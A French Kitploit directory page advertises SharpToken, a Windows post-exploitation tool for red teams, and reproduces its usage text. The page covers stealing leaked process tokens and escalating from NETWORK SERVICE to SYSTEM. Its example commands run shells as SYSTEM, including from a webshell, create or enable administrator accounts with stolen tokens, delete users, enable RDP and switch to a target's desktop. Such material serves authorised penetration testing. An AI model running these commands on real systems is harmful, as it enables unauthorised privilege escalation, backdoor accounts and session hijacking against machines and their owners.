Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpToken — Outil de vol de jetons Windows et d'escalade de privilèges qui vole les jetons divulgués des processus, permet l'accès au niveau SYSTEM, l'usurpation d'identité d'utilisateur et le changement de bureau sans mots de passe. | Kitploit
Outils/GitHubGitHub/beichendream/sharptoken
Escalade de PrivilègesMouvement LatéralPost-ExploitationRed Teaming
GitHubbeichendream/sharptoken

SharpToken

Outil de vol de jetons Windows et d'escalade de privilèges qui vole les jetons divulgués des processus, permet l'accès au niveau SYSTEM, l'usurpation d'identité d'utilisateur et le changement de bureau sans mots de passe.

Voir le dépôt
49668il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpToken

Lors des mouvements latéraux en red team, nous avons souvent besoin de voler les permissions d'autres utilisateurs. Face à la défense des EDR modernes, il nous est difficile d'utiliser Mimikatz pour obtenir les permissions d'autres utilisateurs, et si l'utilisateur cible n'a aucun processus actif, nous ne pouvons pas utiliser "OpenProcessToken" pour voler un Token.

SharpToken est un outil conçu pour exploiter les fuites de Token. Il peut trouver des Tokens divulgués dans tous les processus du système et les utiliser. Si vous êtes un utilisateur de service à faibles privilèges, vous pouvez même l'utiliser pour passer aux privilèges "NT AUTHORITY\SYSTEM", et vous pouvez basculer vers le bureau de l'utilisateur cible pour faire plus sans avoir besoin de son mot de passe. ..

image

Utilisation

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1

Permissions élevées

En plus du vol de Token habituel pour l'élévation de privilèges, SharpToken permet également d'obtenir des Tokens avec intégrité via Bypass.

Si vous êtes un utilisateur NT AUTHORITY\NETWORK SERVICE et que vous ajoutez le paramètre bypass, SharpToken volera System à partir de RPCSS, c'est-à-dire un passage inconditionnel de NT AUTHORITY\NETWORK SERVICE à NT AUTHORITY\SYSTEM.

image

ListToken

Les informations énumérées incluent SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (handle du Token après duplication), TargetProcessId (processus d'origine du Token), TargetProcessToken (handle du Token dans le processus source), Groups (groupe de l'utilisateur du Token).

root@kitploit:~
SharpToken list_token

image

Énumérer les Tokens depuis un processus spécifique

root@kitploit:~
SharpToken list_token 468

image

Obtenir un shell interactif

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

Obtenir les résultats d'exécution de commandes (exécuté sous webshell)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

Créer un utilisateur administrateur avec le Token volé

root@kitploit:~
SharpToken add_user admin Abcd1234! Administrators

Activer un utilisateur administrateur avec le Token volé

root@kitploit:~
SharpToken enableUser Guest Abcd1234! Administrators

Supprimer un utilisateur avec un Token volé

root@kitploit:~
SharpToken delete_user admin

Utiliser le Token volé pour basculer vers le bureau de la cible

Où 1 est le bureau de l'utilisateur cible et 2 est le bureau que nous voulons recevoir.

root@kitploit:~
SharpToken tscon 1 2

LICENCE

Licence publique générale GNU

Références

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

Télécharger l’outil